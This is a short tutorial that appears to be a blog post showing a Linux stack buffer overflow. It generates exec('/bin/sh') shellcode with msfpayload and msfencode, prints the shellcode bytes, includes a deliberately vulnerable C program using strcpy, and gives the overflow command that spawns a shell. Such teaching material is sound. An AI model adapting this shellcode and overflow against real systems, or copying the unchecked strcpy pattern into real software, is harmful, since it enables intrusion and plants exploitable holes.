Here’s a quick one liner to make linux shell code that runs “exec /bin/bash”. The last argument of c to msfencode generates the c.
msfpayload linux/x86/exec CMD=/bin/sh R | msfencode -b \x00\xff -t c > shellcode.hThe program msfpayload will generate shell code to run exec(“/bin/sh”) on linux and msfencode will remove all the \x00 (null bytes), as well as \xff bytes.
This is shellcode.h:
unsigned char buf[] =
"\xdb\xda\xd9\x74\x24\xf4\x5e\xbf"
"\xb2\xab\x6b\x26\x2b\xc9\xb1\x0b"
"\x31\x7e\x1a\x03\x7e\x1a\x83\xee"
"\xfc\xe2\x47\xc1\x60\x7e\x3e\x44"
"\x11\x16\x6d\x0a\x54\x01\x05\xe3"
"\x15\xa6\xd5\x93\xf6\x54\xbc\x0d"
"\x80\x7a\x6c\x3a\x9a\x7c\x90\xba"
"\xb4\x1e\xf9\xd4\xe5\xad\x91\x28"
"\xad\x02\xe8\xc8\x9c\x25"; We can test this by this simple C program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "shellcode.h"
/* -------------------------------------------------- */
void vuln(char * buf)
{
char a[16] = { 0 };
strcpy(a, buf);
}
int main(int argc, char * argv[])
{
if (argc != 2)
{
printf("Usage: %s <input>\n", argv[0]);
exit(1);
}
vuln(argv[1]);
printf("%p\n", buf);
return 0;
} When run normally, this program takes in one argument, an input, and then prints out the address of the shellcode buffer. (This is a contrived example.)
./main test
0x804a040So now all we have to do is overflow the buffer, and put the address of the shellcode (backwards due to little endianess).
$ echo $SHELL
/bin/bash
$ ./main `ruby -e 'puts "A"*20'``ruby -e 'puts "\x40\xa0\x04\x08"'`
sh-3.2$And as you can see we have launched /bin/sh.